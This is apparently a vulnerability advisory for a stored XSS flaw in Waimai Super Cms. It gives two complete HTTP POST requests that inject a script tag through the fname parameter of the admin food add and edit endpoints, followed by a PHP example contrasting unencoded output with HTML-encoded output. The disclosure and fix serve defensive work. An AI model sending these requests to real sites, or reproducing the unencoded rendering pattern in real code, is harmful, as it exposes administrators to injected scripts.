XSS Vulnerability in Waimai Super Cms
In waimai Super Cms master, there is an XSS vulnerability via the /admin.php/Food/addsave and /admin.php/Food/editsave fname parameter.
Payload: `<script>alert(20);</script>`
Exploit URL / Algorithm:
#1

```http
POST /xxx/waimaicmsn/waimai-master/admin.php?m=Food&a=addsave HTTP/1.1
Host: xx.x.x.x:xxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.8.4.2:xxx/xxx/waimaicmsn/waimai-master/admin.php?m=Food&a=add
Cookie: wp-settings-time-1=1538144068; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; PHPSESSID=eu0e287boau61i75im4stoosc2; INTELLI_569865769d=3a45337e2cd3e1125dd42f9387ef0609; __atuvc=3%7C41; __tins__16868462=%7B%22sid%22%3A%201539063191636%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201539064991636%7D; 51cke=; 51laig=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=--------1708972804
Content-Length: 551

----------1708972804
Content-Disposition: form-data; name="fname"

sample<script>alert(2);</script>
----------1708972804
Content-Disposition: form-data; name="fcid"

19
----------1708972804
Content-Disposition: form-data; name="pic"; filename=""
Content-Type: application/octet-stream


----------1708972804
Content-Disposition: form-data; name="fprice"

1
----------1708972804
Content-Disposition: form-data; name="fcontent"

sss
----------1708972804
Content-Disposition: form-data; name="fsort"

0
----------1708972804--
```
#2

```http
POST /sug/waimaicmsn/waimai-master/admin.php?m=Food&a=editsave HTTP/1.1
Host: 10.8.4.2:xxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.x.x.x:xxx/xxx/waimaicmsn/waimai-master/admin.php?m=Food&a=edit&id=90
Cookie: wp-settings-time-1=1538144068; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; PHPSESSID=eu0e287boau61i75im4stoosc2; INTELLI_569865769d=3a45337e2cd3e1125dd42f9387ef0609; __atuvc=3%7C41; __tins__16868462=%7B%22sid%22%3A%201539063191636%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201539064991636%7D; 51cke=; 51laig=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------141470576471630910151028888
Content-Length: 912

-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fname"

furf<script>alert(20);</script>
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fid"

90
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fcid"

19
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="pic"; filename=""
Content-Type: application/octet-stream


-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fprice"

0.00
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fcontent"

dsdd
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fsort"

0
-----------------------------141470576471630910151028888--
```
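
An added example, not part of the original report and not code from Waimai Super Cms: it contrasts an unencoded render of the stored `fname` value with an output-encoded one, and adds save-time validation as a second layer. All function names are hypothetical, and it assumes the admin food list echoes `fname` into an HTML table cell.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers: none of these names come from the Waimai Super Cms code base.

/** Encode a value for an HTML text node or a quoted attribute value. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Unsafe pattern: the stored name is concatenated into markup as-is. */
function render_food_row_unsafe(array $food): string
{
    return '<tr><td>' . $food['fname'] . '</td><td>' . $food['fprice'] . '</td></tr>';
}

/** Hardened pattern: every stored field is encoded at the point of output. */
function render_food_row_safe(array $food): string
{
    return '<tr><td>' . h((string) $food['fname']) . '</td><td>'
        . h((string) $food['fprice']) . '</td></tr>';
}

/** Save-time validation as defence in depth; output encoding remains the actual fix. */
function validate_food_input(array $post): array
{
    $fname = trim((string) ($post['fname'] ?? ''));
    if ($fname === '' || mb_strlen($fname, 'UTF-8') > 64) {
        throw new InvalidArgumentException('fname must be 1-64 characters');
    }
    if (preg_match('/[\x00-\x1F\x7F]/', $fname) === 1) {
        throw new InvalidArgumentException('fname contains control characters');
    }
    $fprice = filter_var($post['fprice'] ?? null, FILTER_VALIDATE_FLOAT);
    if ($fprice === false || $fprice < 0) {
        throw new InvalidArgumentException('fprice must be a non-negative number');
    }
    return ['fname' => $fname, 'fprice' => number_format($fprice, 2, '.', '')];
}

// Constructed input: the fname and fprice values from request #1 in the report.
$food = validate_food_input(['fname' => 'sample<script>alert(2);</script>', 'fprice' => '1']);

echo render_food_row_unsafe($food), PHP_EOL; // script element reaches the browser intact
echo render_food_row_safe($food), PHP_EOL;   // markup characters arrive as &lt; and &gt;
```

The validator deliberately accepts `<` and `>` in a name, so the reported value passes it; only the encoding in `render_food_row_safe()` stops the browser from parsing it as markup.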